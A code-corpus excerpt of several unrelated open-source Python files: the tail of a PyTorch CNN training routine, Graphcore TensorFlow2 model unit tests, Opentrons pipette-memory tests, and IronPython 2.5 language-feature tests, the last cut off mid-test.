activation_out1 = self.activation1(conv_out1)
max_out1 = self.max_out1(activation_out1).squeeze(2)
conv_out2 = self.conv2(x).squeeze(3)
activation_out2 = self.activation2(conv_out2)
max_out2 = self.max_out2(activation_out2).squeeze(2)
conv_out3 = self.conv3(x).squeeze(3)
activation_out3 = self.activation3(conv_out3)
max_out3 = self.max_out3(activation_out3).squeeze(2)
all_out = torch.cat((max_out1, max_out2, max_out3), 1)
final_feature_map = self.dropout(all_out)
final_out = self.fc(final_feature_map)
return self.softmax(final_out)
def add_optimizer(self, optimizer):
self.optimizer = optimizer
def add_loss_op(self, loss_op):
self.loss_op = loss_op
def run_epoch(self, train_data, val_data):
train_x, train_y = train_data[0], train_data[1]
val_x, val_y = val_data[0], val_data[1]
iterator = data_iterator(train_x, train_y, self.config.batch_size)
train_losses = []
val_accuracies = []
losses = []
for i, (x,y) in enumerate(iterator):
self.optimizer.zero_grad()
x = Tensor(x).cuda()
y_pred = self.__call__(x)
loss = self.loss_op(y_pred, torch.cuda.LongTensor(y-1))
loss.backward()
losses.append(loss.data.cpu().numpy())
self.optimizer.step()
if (i + 1) % 50 == 0:
print("Iter: {}".format(i+1))
avg_train_loss = np.mean(losses)
train_losses.append(avg_train_loss)
print("\tAverage training loss: {:.5f}".format(avg_train_loss))
losses = []
# Evalute Accuracy on validation set
self.eval()
all_preds = []
val_iterator = data_iterator(val_x, val_y, self.config.batch_size)
for j, (x,y) in enumerate(val_iterator):
x = Variable(Tensor(x))
y_pred = self.__call__(x.cuda())
predicted = torch.max(y_pred.cpu().data, 1)[1] + 1
all_preds.extend(predicted.numpy())
score = accuracy_score(val_y, np.array(all_preds).flatten())
val_accuracies.append(score)
print("\tVal Accuracy: {:.4f}".format(score))
self.train()
return train_losses, val_accuracies
|
applications/tensorflow2/image_classification/test/test_models.py
|
payoto/graphcore_examples
| 260 |
88883
|
<filename>applications/tensorflow2/image_classification/test/test_models.py<gh_stars>100-1000
# Copyright (c) 2021 Graphcore Ltd. All rights reserved.
import unittest
from pathlib import Path
import sys
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.python import ipu
sys.path.append(str(Path(__file__).absolute().parent.parent))
from model.model_factory import ModelFactory
from model.toy_model import ToyModel
from model.resnet_models import ResNet50
from custom_exceptions import DimensionError
class ResNetVersionTest(unittest.TestCase):
@staticmethod
def get_num_of_trainable_weights(model):
return np.sum([np.prod(layer.numpy().shape) for layer in model.trainable_weights])
def test_resnet50_num_learnable_parameters(self):
'''A test of whether ResNet50 implementations in TF1 and TF2 are alike.'''
NUM_OF_LEARNABLE_PARAMETERS_TF1 = 25557032
num_trainable_weights_tf2 = self.get_num_of_trainable_weights(model=ResNet50())
assert num_trainable_weights_tf2 == NUM_OF_LEARNABLE_PARAMETERS_TF1
class UnsupportedModelTest(unittest.TestCase):
def test_unsupported_model(self):
with self.assertRaises(NameError):
ModelFactory.create_model(model_name='foo',
input_shape=(32, 32, 3),
classes=2)
class InvalidStageNameTest(unittest.TestCase):
def test_invalid_layer_name(self):
train_strategy = ipu.ipu_strategy.IPUStrategy()
with train_strategy.scope():
model = ModelFactory.create_model(model_name='toy_model', weights=None, input_shape=(28, 28, 1), classes=10)
with self.assertRaises(NameError):
model = ModelFactory.configure_model(model=model, gradient_accumulation_count=1, pipeline_splits=[
'foo'], device_mapping=[], pipeline_schedule='Grouped',
available_memory_proportion=[])
def test_invalid_layer_order(self):
train_strategy = ipu.ipu_strategy.IPUStrategy()
with train_strategy.scope():
model = ModelFactory.create_model(model_name='toy_model', weights=None, input_shape=(28, 28, 1), classes=10)
with self.assertRaises(NameError):
model = ModelFactory.configure_model(model=model, gradient_accumulation_count=1, pipeline_splits=[
'conv2d_1', 'conv2d'], device_mapping=[], pipeline_schedule='Grouped',
available_memory_proportion=[])
class InvalidDeviceMappingTest(unittest.TestCase):
def test_invalid_number_of_device_mapping(self):
train_strategy = ipu.ipu_strategy.IPUStrategy()
with train_strategy.scope():
model = ModelFactory.create_model(model_name='toy_model', weights=None, input_shape=(28, 28, 1), classes=10)
with self.assertRaises(DimensionError):
model = ModelFactory.configure_model(model=model, gradient_accumulation_count=1, pipeline_splits=[
'conv2d_1', 'flatten'], device_mapping=[0, 1], pipeline_schedule='Grouped',
available_memory_proportion=[])
def test_invalid_id_of_device_mapping(self):
train_strategy = ipu.ipu_strategy.IPUStrategy()
with train_strategy.scope():
model = ModelFactory.create_model(model_name='toy_model', weights=None, input_shape=(28, 28, 1), classes=10)
with self.assertRaises(DimensionError):
model = ModelFactory.configure_model(model=model, gradient_accumulation_count=1, pipeline_splits=[
'conv2d_1', 'flatten'], device_mapping=[1, 2, 3], pipeline_schedule='Grouped',
available_memory_proportion=[])
class CreateModelTest(unittest.TestCase):
def get_predictions_for_model(self, model_name: str):
tf.random.set_seed(1)
np.random.seed(0)
image0 = np.zeros((1, 32, 32, 3))
image1 = np.ones((1, 32, 32, 3)) * 10
model = ModelFactory.create_model(model_name=model_name,
input_shape=(32, 32, 3),
classes=2)
image0_preds = model.predict(image0)[0]
image1_preds = model.predict(image1)[0]
tf.random.set_seed(None)
np.random.seed(None)
return (image0_preds, image1_preds)
def test_resnet50_output(self):
image0_preds, image1_preds = self.get_predictions_for_model(model_name='resnet50')
assert (np.array_equal(image0_preds, [0.5, 0.5]))
assert (np.allclose(image1_preds, [0.40129033, 0.5987097]))
def test_resnet34_output(self):
image0_preds, image1_preds = self.get_predictions_for_model(model_name='resnet34')
assert (np.array_equal(image0_preds, [0.5, 0.5]))
assert (np.allclose(image1_preds, [0.53946716, 0.46053284]))
def test_resnet18_output(self):
image0_preds, image1_preds = self.get_predictions_for_model(model_name='resnet18')
assert (np.array_equal(image0_preds, [0.5, 0.5]))
assert (np.allclose(image1_preds, [0.44021496, 0.55978507]))
class CreateToyModelTest(unittest.TestCase):
def test_toy_model_prediction(self):
tf.random.set_seed(1)
model = ToyModel(input_shape=(32, 32, 3), classes=10)
image_1 = np.ones((1, 32, 32, 3)) * 10
assert (np.allclose(
model.predict(image_1)[0], [0.08292384, 0.05735856, 0.27028584, 0.2666999, 0.02177826,
0.01853362, 0.06498592, 0.04272136, 0.15957771, 0.015135]))
tf.random.set_seed(None)
class CreateToyModelInFactory(unittest.TestCase):
def test_toy_model_factory_prediction(self):
tf.random.set_seed(1)
model = ModelFactory.create_model(model_name='toy_model',
weights=None,
input_shape=(32, 32, 3),
classes=10)
image_1 = np.ones((1, 32, 32, 3)) * 10
assert (np.allclose(
model.predict(image_1)[0], [0.08292384, 0.05735856, 0.27028584, 0.2666999, 0.02177826,
0.01853362, 0.06498592, 0.04272136, 0.15957771, 0.015135]))
tf.random.set_seed(None)
class ConfigurePipelineTest(unittest.TestCase):
def test_pipeline_split(self):
def initial_model_1():
model_input = keras.Input(shape=(32, 32, 3))
model_output = keras.layers.MaxPooling2D(name='test_pipeline_split_layer1')(model_input)
model_output_1 = keras.layers.Conv2D(
filters=32, kernel_size=3, name='test_pipeline_split_layer2')(model_output)
model_output_2 = keras.layers.Conv2D(
filters=32, kernel_size=3, name='test_pipeline_split_layer3')(model_output)
model_output = keras.layers.Add(name='test_pipeline_split_layer4')([model_output_1, model_output_2])
model_output = keras.layers.Flatten(name='test_pipeline_split_layer5')(model_output)
return keras.Model(model_input, model_output)
def expected_model_1():
model_input = keras.Input(shape=(32, 32, 3))
with ipu.keras.PipelineStage(0):
model_output = keras.layers.MaxPooling2D()(model_input)
model_output_1 = keras.layers.Conv2D(filters=32, kernel_size=3)(model_output)
with ipu.keras.PipelineStage(1):
model_output_2 = keras.layers.Conv2D(filters=32, kernel_size=3)(model_output)
model_output = keras.layers.Add()([model_output_1, model_output_2])
with ipu.keras.PipelineStage(2):
model_output = keras.layers.Flatten()(model_output)
return keras.Model(model_input, model_output)
train_strategy = ipu.ipu_strategy.IPUStrategy()
with train_strategy.scope():
model = initial_model_1()
pipelined_model = ModelFactory.configure_model(model=model, gradient_accumulation_count=1, pipeline_splits=[
'test_pipeline_split_layer3', 'test_pipeline_split_layer5'],
device_mapping=[], pipeline_schedule='Grouped',
available_memory_proportion=[])
expected_assignments = expected_model_1().get_pipeline_stage_assignment()
pipelined_assignments = pipelined_model.get_pipeline_stage_assignment()
for expected_assignment, pipelined_assignment in zip(expected_assignments, pipelined_assignments):
assert(expected_assignment.layer.__class__.name == pipelined_assignment.layer.__class__.name)
assert(expected_assignment.pipeline_stage == pipelined_assignment.pipeline_stage)
|
api/tests/opentrons/tools/test_pipette_memory.py
|
anuwrag/opentrons
| 235 |
88921
|
from mock import AsyncMock
import pytest
from opentrons.drivers.smoothie_drivers import SmoothieDriver
from opentrons.tools import write_pipette_memory
@pytest.fixture
def mock_driver() -> AsyncMock:
return AsyncMock(spec=SmoothieDriver)
async def test_write_identifiers(mock_driver: AsyncMock) -> None:
"""It should call driver to write a new id and model."""
mount = "left"
new_id = "some id"
new_model = "some model"
mock_driver.read_pipette_id.return_value = new_id
mock_driver.read_pipette_model.return_value = new_model
await write_pipette_memory.write_identifiers(
mount=mount, new_id=new_id, new_model=new_model, driver=mock_driver
)
mock_driver.write_pipette_id.assert_called_once_with(mount, new_id)
mock_driver.read_pipette_id.assert_called_once_with(mount)
mock_driver.write_pipette_model.assert_called_once_with(mount, new_model)
mock_driver.read_pipette_model.assert_called_once_with(mount)
async def test_write_identifiers_id_mismatch(mock_driver: AsyncMock) -> None:
"""It should fail when written id doesn't match read id."""
mount = "left"
new_id = "some id"
new_model = "some model"
mock_driver.read_pipette_id.return_value = new_id + "_wrong"
with pytest.raises(Exception):
await write_pipette_memory.write_identifiers(
mount=mount, new_id=new_id, new_model=new_model, driver=mock_driver
)
async def test_write_identifiers_model_mismatch(mock_driver: AsyncMock) -> None:
"""It should fail when written model doesn't match read model."""
mount = "left"
new_id = "some id"
new_model = "some model"
mock_driver.read_pipette_id.return_value = new_id
mock_driver.read_pipette_model.return_value = new_model + "_wrong"
with pytest.raises(Exception):
await write_pipette_memory.write_identifiers(
mount=mount, new_id=new_id, new_model=new_model, driver=mock_driver
)
async def test_check_previous_data(mock_driver: AsyncMock) -> None:
"""It should read the pipette id and model"""
mount = "left"
await write_pipette_memory.check_previous_data(mount, mock_driver)
mock_driver.read_pipette_id.assert_called_once_with(mount)
mock_driver.read_pipette_model.assert_called_once_with(mount)
pipette_barcode_to_model = {
"P10S20180101A01": "p10_single_v1",
"P10M20180101A01": "p10_multi_v1",
"P50S180101A01": "p50_single_v1",
"P50M20180101B01": "p50_multi_v1",
"P300S20180101A01": "p300_single_v1",
"P300M20180101A01": "p300_multi_v1",
"P1000S20180101A01": "p1000_single_v1",
"P10SV1318010101": "p10_single_v1.3",
"P10MV1318010102": "p10_multi_v1.3",
"P50SV1318010103": "p50_single_v1.3",
"P50MV1318010104": "p50_multi_v1.3",
"P3HSV1318010105": "p300_single_v1.3",
"P3HMV1318010106": "p300_multi_v1.3",
"P1KSV1318010107": "p1000_single_v1.3",
"P10SV1418010101": "p10_single_v1.4",
"P10MV1418010102": "p10_multi_v1.4",
"P50SV1418010103": "p50_single_v1.4",
"P50MV1418010104": "p50_multi_v1.4",
"P3HSV1418010105": "p300_single_v1.4",
"P3HMV1418010106": "p300_multi_v1.4",
"P1KSV1418010107": "p1000_single_v1.4",
"P20MV2120120204": "p20_multi_v2.1",
"P1KSV2218010107": "p1000_single_v2.2",
"P20SV2220020501": "p20_single_v2.2",
}
def test_parse_model_from_barcode() -> None:
for barcode, model in pipette_barcode_to_model.items():
assert write_pipette_memory._parse_model_from_barcode(barcode) == model
with pytest.raises(Exception):
write_pipette_memory._parse_model_from_barcode("P1HSV1318010101")
with pytest.raises(Exception):
write_pipette_memory._parse_model_from_barcode("P1KSV1218010101")
with pytest.raises(Exception):
write_pipette_memory._parse_model_from_barcode("aP300S20180101A01")
|
Tests/test_python25.py
|
cwensley/ironpython2
| 1,078 |
88932
|
<filename>Tests/test_python25.py
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
import exceptions
import sys
import unittest
from iptest import is_cli, run_test
isPython25 = ((sys.version_info[0] == 2) and (sys.version_info[1] >= 5)) or (sys.version_info[0] > 2)
m = 0
gblvar = 0
@unittest.skipUnless(isPython25, 'Version of Python is too low, must be 2.5 or above')
class Python25Test(unittest.TestCase):
def test_raise_exit(self):
"""test case with RAISE(exit consumes), YIELD, RETURN, BREAK and CONTINUE in WITH"""
globals()["m"] = 0
class A:
def __enter__(self):
globals()["m"] += 99
return 300
def __exit__(self,type,value,traceback):
if(type == None and value == None and traceback == None):
globals()["m"] += 55
else:
globals()["m"] *= 2
return 1
a = A()
def foo():
p = 100
for y in [1,2,3,4,5,6,7,8,9]:
for x in [10,20,30,40,50,60,70,80,90]:
with a as b:
p = p + 1
if ( x == 20 ): continue
if ( x == 50 and y == 5 ): break
if( x != 40 and y != 4) : yield p
p = p + 5
p = p + x * 100
p = p + 1
if(x % 3 == 0):
raise RuntimeError("we force exception")
if(y == 8):
globals()["m"] += p
return
if(x % 3 == 0 and y %3 == 0):
raise RuntimeError("we force exception")
if ( x == 90 ): continue
if ( x == 60 and y == 6 ): break
yield b + p
p = p + 1
try:
k = foo()
while(k.next()):pass
except StopIteration: self.assertEqual(globals()["m"],427056988)
else:self.fail("Expected StopIteration but found None")
def test__enter__(self):
"""testing __enter__"""
def just_a_fun(arg): return 300
class B:
def __enter__(self): return "Iron", "Python", just_a_fun
def __exit__(self, a,b,c): pass
mydict = {1: [0,1,2], 2:None }
with B() as (mydict[1][0], mydict[2], B.myfun):
self.assertEqual((mydict[1],mydict[2],B().myfun()),(["Iron",1,2],"Python",just_a_fun(None)) )
#ensure it is same outside with also
self.assertEqual((mydict[1],mydict[2],B().myfun()),(["Iron",1,2],"Python",just_a_fun(None)) )
# more args
class C:
def __enter__(self,morearg): pass
def __exit__(self, a,b,c): pass
try:
with C() as something: pass
except TypeError: pass
else :self.fail("Expected TypeError but found None")
#enter raises
class D:
def __enter__(self):
raise RuntimeError("we force an error")
def __exit__(self, a,b,c): pass
try:
with D() as something: pass
except RuntimeError: pass
else :self.fail("Expected RuntimeError but found None")
#missing enter
class MissingEnter:
def __exit__(self,a,b,c): pass
try:
with MissingEnter(): pass
except AttributeError:pass
else: self.fail("Expected AttributeError but found None")
def test__exit__(self):
"""Testing __exit__"""
globals()["gblvar"] = 0
# more args
class E:
def __enter__(self): pass
def __exit__(self, a,b,c,d,e,f): pass
try:
with E() as something: pass
except TypeError: pass
else :self.fail("Expected TypeError but found None")
# less args
class F:
def __enter__(self): pass
def __exit__(self): pass
try:
with F() as something: pass
except TypeError: pass
else :self.fail("Expected TypeError but found None")
#exit raises
class H:
def __enter__(self): H.var1 = 100
def __exit__(self, a,b,c):
H.var2 = 200
raise RuntimeError("we force an error")
try:
with H():
H.var3 = 300
except RuntimeError: self.assertEqual((H.var1,H.var2,H.var3),(100,200,300))
else :self.fail("Expected RuntimeError but found None")
#exit raises on successful / throwing WITH
class Myerr1(Exception):pass
class Myerr2(Exception):pass
class Myerr3(Exception):pass
class ExitRaise:
def __enter__(self): H.var1 = 100
def __exit__(self, a,b,c):
if(a == None and b == None and c == None):
raise Myerr1
raise Myerr2
try:
with ExitRaise():
1+2+3
except Myerr1: pass
else :self.fail("Expected Myerr1 but found None")
try:
with ExitRaise():
raise Myerr3
except Myerr2: pass
else :self.fail("Expected Myerr2 but found None")
#exit propagates exception on name deletion ( covers FLOW CHECK scenario)
class PropagateException:
def __enter__(self): pass
def __exit__(self, a,b,c): return False
try:
with PropagateException() as PE:
del PE
print PE
except NameError:pass
else: self.fail("Expected NameError but found None")
try:
with PropagateException() as PE:
PE.var1 = 100
del PE
print PE
except AttributeError:pass
else: self.fail("Expected AttributeError but found None")
#exit consumes exception
class ConsumeException:
def __enter__(self): pass
def __exit__(self, a,b,c): return [1,2,3],{"dsad":"dsd"},"hello"
with ConsumeException():1/0
#missing exit
class MissingExit:
def __enter__(self): pass
try:
with MissingEnter(): pass
except NameError: pass
else: self.fail("Expected AttributeError but found None")
#With Stmt under other compound statements (NO YIELD)
globals()["gblvar"] = 0
#inheritance
class cxtmgr:
def __exit__(self, a, b, c):
globals()["gblvar"] += 10
return False
class inherited_cxtmgr(cxtmgr):
def __enter__(self):
globals()["gblvar"] += 10
return False
# Building up most complex TRY-CATCH-FINALLY-RAISE-WITH-CLASS combination with inheritance.
#try->(try->(except->(with ->fun ->(try->(with->raise)->Finally(With)))))
try: #Try
try: #try->try
globals()["gblvar"] += 1
1/0
except ZeroDivisionError: #try->(try->except)
globals()["gblvar"] += 2
with inherited_cxtmgr() as ic: #try->(try->(except->with(inherited)))
globals()["gblvar"] += 3
def fun_in_with(): return "Python is smart"
self.assertEqual(fun_in_with(),"Python is smart") #try->(try->(except->(with ->fun)))
try: #try->(try->(except->(with ->fun ->try)))
globals()["gblvar"] += 4
with inherited_cxtmgr() as inherited_cxtmgr.var: #try->(try->(except->(with ->fun ->(try->with))))
globals()["gblvar"] += 5
raise Myerr1() #try->(try->(except->(with ->fun ->(try->with->raise))))
finally: #try->(try->(except->(with ->fun ->(try->(with->raise)->Finally))))
if not is_cli: #https://github.com/IronLanguages/main/issues/844
self.assertEqual(sys.exc_info()[0], Myerr1)
else:
self.assertEqual(sys.exc_info()[0], exceptions.ZeroDivisionError)
globals()["gblvar"] += 6
class ClassInFinally:
def __enter__(self):
globals()["gblvar"] += 7
return 200
def __exit__(self,a,b,c):
globals()["gblvar"] += 8
return False # it raises
with ClassInFinally(): #try->(try->(except->(with ->fun ->(try->(with->raise)->Finally(With)))))
globals()["gblvar"] += 9
except Myerr1: self.assertEqual(globals()["gblvar"],85)
# With in __enter__ and __exit__
globals()["gblvar"] = 0
class A:
def __enter__(self): globals()["gblvar"] += 1 ; return 100
def __exit__(self,a,b,c): globals()["gblvar"] += 2; return 200
class WithInEnterExit:
def __enter__(self):
with A() as b:
globals()["gblvar"] += 3;return A()
def __exit__(self,a,b,c):
with A() as c:
globals()["gblvar"] += 4; return A()
self.assertEqual(1,1)
with WithInEnterExit() as wie:
with wie as wie_wie:
globals()["gblvar"] += 100
self.assertEqual(globals()["gblvar"],116)
def test_thread_lock(self):
import thread
temp_lock = thread.allocate_lock()
self.assertTrue(hasattr(temp_lock, "__enter__"))
self.assertTrue(hasattr(temp_lock, "__exit__"))
self.assertTrue(not temp_lock.locked())
with temp_lock:
self.assertTrue(temp_lock.locked())
self.assertTrue(not temp_lock.locked())
with thread.allocate_lock(): pass
def test_with_file(self):
with file('abc.txt', 'w'):
pass
def test_try_catch_finally(self):
# test try-catch-finally syntax
globals()["gblvar"] = 1
def setvar() : globals()["gblvar"] += 1
#missing except,else
try:
setvar()
# missing else, finally
try:1 / 0
except ZeroDivisionError: setvar()
# missing else
try:
setvar()
a =[]
a[10]
except ZeroDivisionError: assert(False)
except IndexError: setvar()
finally: setvar()
finally:
setvar()
self.assertEqual(globals()["gblvar"],7)
globals()["gblvar"] = 1
class MyErr1(Exception) :pass
class MyErr2(Exception) :pass
class MyErr3(Exception) :pass
class MyErr4(Exception) :pass
def TestUnifiedTry(myraise1,myraise2, myraise3,myraise4,myraise5,myraise6,myraise7,myraise8,myraise9):
try:
yield 1; setvar()
yield 2; setvar()
try:
setvar()
if myraise1 == "raiseInTry" :setvar(); raise MyErr1
if myraise1 == "outerTry" :setvar(); raise MyErr2
if myraise1 == "Unhandled" :setvar(); raise MyErr4
setvar()
except MyErr1:
setvar()
if myraise2 == "raiseInExcept": setvar(); raise MyErr2
if myraise2 == "Unhandled": setvar(); raise MyErr4
setvar()
except :setvar() # should never be executed
else :
setvar()
if myraise2 == "raiseInElse": setvar(); raise MyErr2
if myraise2 == "Unhandled": setvar(); raise MyErr4
setvar()
finally :
setvar()
if myraise3 == "raiseInFinally": setvar(); raise MyErr3
if myraise3 == "Unhandled": setvar(); raise MyErr4
setvar()
yield 1; setvar()
yield 2; setvar()
except MyErr2:
yield 1; setvar()
yield 2; setvar()
try:
setvar()
if myraise4 == "raiseInTry" :setvar(); raise MyErr1
if myraise4 == "Unhandled" :setvar(); raise MyErr4
setvar()
except MyErr1:
setvar()
if myraise5 == "Unhandled": setvar(); raise MyErr4
setvar()
except :setvar() # should never be executed
else :
setvar()
if myraise5 == "Unhandled": setvar(); raise MyErr4
setvar()
finally :
setvar()
if myraise6 == "Unhandled": setvar(); raise MyErr4
setvar()
yield 1; setvar()
yield 2; setvar()
except MyErr3:
yield 1; setvar()
yield 2; setvar()
try:
setvar()
if myraise4 == "raiseInTry" :setvar(); raise MyErr1
if myraise4 == "Unhandled" :setvar(); raise MyErr4
setvar()
except MyErr1:
setvar()
if myraise5 == "Unhandled": setvar(); raise MyErr4
setvar()
except :setvar() # should never be executed
else :
setvar()
if myraise5 == "Unhandled": setvar(); raise MyErr4
setvar()
finally :
setvar()
if myraise6 == "Unhandled": setvar(); raise MyErr4
setvar()
yield 1; setvar()
yield 2; setvar()
else :
yield 1; setvar()
yield 2; setvar()
try:
setvar()
if myraise4 == "raiseInTry" :setvar(); raise MyErr1
if myraise4 == "Unhandled" :setvar(); raise MyErr4
setvar()
except MyErr1:
setvar()
if myraise5 == "Unhandled": setvar(); raise MyErr4
setvar()
except :setvar() # should never be executed
else :
setvar()
if myraise5 == "Unhandled": setvar(); raise MyErr4
setvar()
finally :
setvar()
if myraise6 == "Unhandled": setvar(); raise MyErr4
setvar()
yield 1; setvar()
yield 2; setvar()
finally :
#uncomment the following 2 lines once we have the fix for PS:1752
#and accordingly adjust the final expected result value
#yield 1; setvar()
#yield 2; setvar()
try:
setvar()
if myraise7 == "raiseInTry" :setvar(); raise MyErr1
setvar()
if myraise7 == "Unhandled" :setvar(); raise MyErr4
setvar()
except MyErr1:
setvar()
if myraise8 == "Unhandled": setvar(); raise MyErr4
setvar()
except :setvar() # should never be executed
else :
setvar()
if myraise8 == "Unhandled": setvar(); raise MyErr4
setvar()
finally :
setvar()
if myraise9 == "Unhandled": setvar(); raise MyErr4
setvar()
#uncomment the following 2 lines once we have the fix for PS:1752
#and accordingly adjust the final expected result value
#yield 1; setvar()
#yield 2; setvar()
myraise1 = ["raiseInTry","outerTry","Unhandled","None"]
myraise2 = ["raiseInExcept", "raiseInElse","Unhandled","None"]
myraise3 = ["raiseInFinally","Unhandled","None"]
myraise4 = ["raiseInTry","Unhandled","None"]
myraise5 = ["Unhandled","None"]
myraise6 = ["Unhandled","None"]
myraise7 = ["raiseInTry","Unhandled","None"]
myraise8 = ["Unhandled","None"]
myraise9 = ["Unhandled","None"]
def fun():
for a in myraise1:
for b in myraise2:
for c in myraise3:
for d in myraise4:
for e in myraise5:
for f in myraise6:
for g in myraise7:
for h in myraise8:
for i in myraise9:
k = TestUnifiedTry(a,b,c,d,e,f,g,h,i)
while(True):
try:
k.next()
except MyErr4: setvar();break
except StopIteration: setvar();break
fun()
self.assertEqual(globals()["gblvar"],141985)
def test_try_catch_finally_on_targets(self):
#test try-catch-finally on targets
globals()["gblvar"] = 1
def setvar() : globals()["gblvar"] += 1
def TestTargets(ret):
x = 0
y = 0
z = 0
setvar()
while( z < 6 ) :
z += 1
while( y < 8 ) :
y += 1
while( x < 20 ) :
x += 1
setvar()
try:
setvar()
if not x % 3 : setvar();continue
if not x % 4 : setvar();break
if not x % 5 : setvar();1 / 0
if not x % 7 and ret == "try" : setvar();return
setvar()
except:
setvar()
if not y % 3 : setvar();continue
if not y % 4 : setvar();break
if not y % 7 and ret == "except" : setvar();return
setvar()
else:
setvar()
if not x % 11 : setvar();continue
if not x % 13 : setvar();break
if not x % 19 and ret == "else" : setvar();return
setvar()
finally:
setvar()
#IPy does support continue under finally, just for CPy compatibility we do not test it here
#if z % 2 : setvar();continue
if not z % 2 : setvar();break
if not z % 5 and ret == "finally" : setvar();return
setvar()
setvar()
return
ret = ["try","except","else","finally"]
for r in ret:
TestTargets(r)
self.assertEqual(globals()["gblvar"],403)
def test_yield_in_finally(self):
"""test yield in finally"""
globals()["gblvar"] = 1
def setvar() : globals()["gblvar"] += 1
def test_yield_finally():
setvar()
try: setvar();1/0
except:setvar()
else: setvar()
finally:
setvar();yield 100
setvar();yield 100
setvar()
setvar()
try:
k = test_yield_finally()
while(1):
next(k)
except StopIteration: pass
self.assertEqual(globals()["gblvar"],8)
def test_string_partition(self):
self.assertEqual('http://www.codeplex.com/WorkItem/List.aspx?ProjectName=IronPython'.partition('://'), ('http','://','www.codeplex.com/WorkItem/List.aspx?ProjectName=IronPython'))
self.assertEqual('http://www.codeplex.com/WorkItem/List.aspx?ProjectName=IronPython'.partition('stringnotpresent'), ('http://www.codeplex.com/WorkItem/List.aspx?ProjectName=IronPython','',''))
self.assertEqual('stringisnotpresent'.partition('presentofcoursenot'), ('stringisnotpresent','',''))
self.assertEqual(''.partition('stringnotpresent'), ('','',''))
self.assertEqual('onlymatchingtext'.partition('onlymatchingtext'), ('','onlymatchingtext',''))
self.assertEqual('alotoftextherethatisapartofprefixonlyprefix_nosuffix'.partition('_nosuffix'), ('alotoftextherethatisapartofprefixonlyprefix','_nosuffix',''))
self.assertEqual('noprefix_alotoftextherethatisapartofsuffixonlysuffix'.partition('noprefix_'), ('','noprefix_','alotoftextherethatisapartofsuffixonlysuffix'))
self.assertEqual('\0'.partition('\0'), ('','\0',''))
self.assertEqual('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\45\77\e9'.partition('\00\56\78'), ('\00\ff\67\56\d8\89\33\09\99\ee\20','\00\56\78','\45\77\e9'))
self.assertEqual('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\45\77\e9'.partition('\78\45\77\e9'), ('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56','\78\45\77\e9',''))
self.assertEqual('\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\45\77\e9'.partition('\ff\67\56\d8\89\33\09\99'), ('','\ff\67\56\d8\89\33\09\99','\ee\20\00\56\78\45\77\e9'))
self.assertEqual(u'\ff\67\56\d8\89\33\09\99some random 8-bit text here \ee\20\00\56\78\45\77\e9'.partition('random'), (u'\ff\67\56\d8\89\33\09\99some ','random',' 8-bit text here \ee\20\00\56\78\45\77\e9'))
self.assertEqual(u'\ff\67\56\d8\89\33\09\99some random 8-bit text here \ee\20\00\56\78\45\77\e9'.partition(u'\33\09\99some r'), (u'\ff\67\56\d8\89','\33\09\99some r','andom 8-bit text here \ee\20\00\56\78\45\77\e9'))
self.assertRaises(ValueError,'sometextheretocauseanexeption'.partition,'')
self.assertRaises(ValueError,''.partition,'')
self.assertRaises(TypeError,'some\90text\ffhere\78to\88causeanexeption'.partition,None)
self.assertRaises(TypeError,''.partition,None)
prefix = """ this is some random text
and it has lots of text
"""
sep = """
that is multilined
and includes unicode \00 \56
\01 \02 \06 \12\33\67\33\ff \ee also"""
suffix = """
\78\ff\43\12\23ok"""
str = prefix + sep + suffix
self.assertEqual(str.partition(sep),(prefix,sep,suffix))
self.assertEqual(str.partition('nomatch'),(str,'',''))
self.assertRaises(TypeError,str.partition,None)
self.assertRaises(ValueError,str.partition,'')
def test_string_rpartition(self):
self.assertEqual('http://www.codeplex.com/WorkItem/List.aspx?Project://Name=IronPython'.rpartition('://'), ('http://www.codeplex.com/WorkItem/List.aspx?Project','://','Name=IronPython'))
self.assertEqual('http://www.codeplex.com/WorkItem/List.aspx?ProjectName=IronPython'.rpartition('stringnotpresent'), ('', '', 'http://www.codeplex.com/WorkItem/List.aspx?ProjectName=IronPython'))
self.assertEqual('stringisnotpresent'.rpartition('presentofcoursenot'), ('','', 'stringisnotpresent'))
self.assertEqual(''.rpartition('stringnotpresent'), ('','',''))
self.assertEqual('onlymatchingtext'.rpartition('onlymatchingtext'), ('','onlymatchingtext',''))
self.assertEqual('alotoftextherethatisapartofprefixonlyprefix_nosuffix'.rpartition('_nosuffix'), ('alotoftextherethatisapartofprefixonlyprefix','_nosuffix',''))
self.assertEqual('noprefix_alotoftextherethatisapartofsuffixonlysuffix'.rpartition('noprefix_'), ('','noprefix_','alotoftextherethatisapartofsuffixonlysuffix'))
self.assertEqual('\0'.partition('\0'), ('','\0',''))
self.assertEqual('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\00\56\78\45\77\e9'.rpartition('\00\56\78'), ('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56\78','\00\56\78','\45\77\e9'))
self.assertEqual('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\45\77\e9\78\45\77\e9'.rpartition('\78\45\77\e9'), ('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\45\77\e9','\78\45\77\e9',''))
self.assertEqual('\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\45\77\e9'.rpartition('\ff\67\56\d8\89\33\09\99'), ('','\ff\67\56\d8\89\33\09\99','\ee\20\00\56\78\45\77\e9'))
self.assertEqual(u'\ff\67\56\d8\89\33\09\99some random 8-bit text here \ee\20\00\56\78\45\77\e9'.rpartition('random'), (u'\ff\67\56\d8\89\33\09\99some ','random',' 8-bit text here \ee\20\00\56\78\45\77\e9'))
self.assertEqual(u'\ff\67\56\d8\89\33\09\99some random 8-bit text here \ee\20\00\56\78\45\77\e9'.rpartition(u'\33\09\99some r'), (u'\ff\67\56\d8\89','\33\09\99some r','andom 8-bit text here \ee\20\00\56\78\45\77\e9'))
self.assertRaises(ValueError,'sometextheretocauseanexeption'.rpartition,'')
self.assertRaises(ValueError,''.rpartition,'')
self.assertRaises(TypeError,'some\90text\ffhere\78to\88causeanexeption'.rpartition,None)
self.assertRaises(TypeError,''.rpartition,None)
prefix = """ this is some random text
and it has lots of text
"""
sep = """
that is multilined
and includes unicode \00 \56
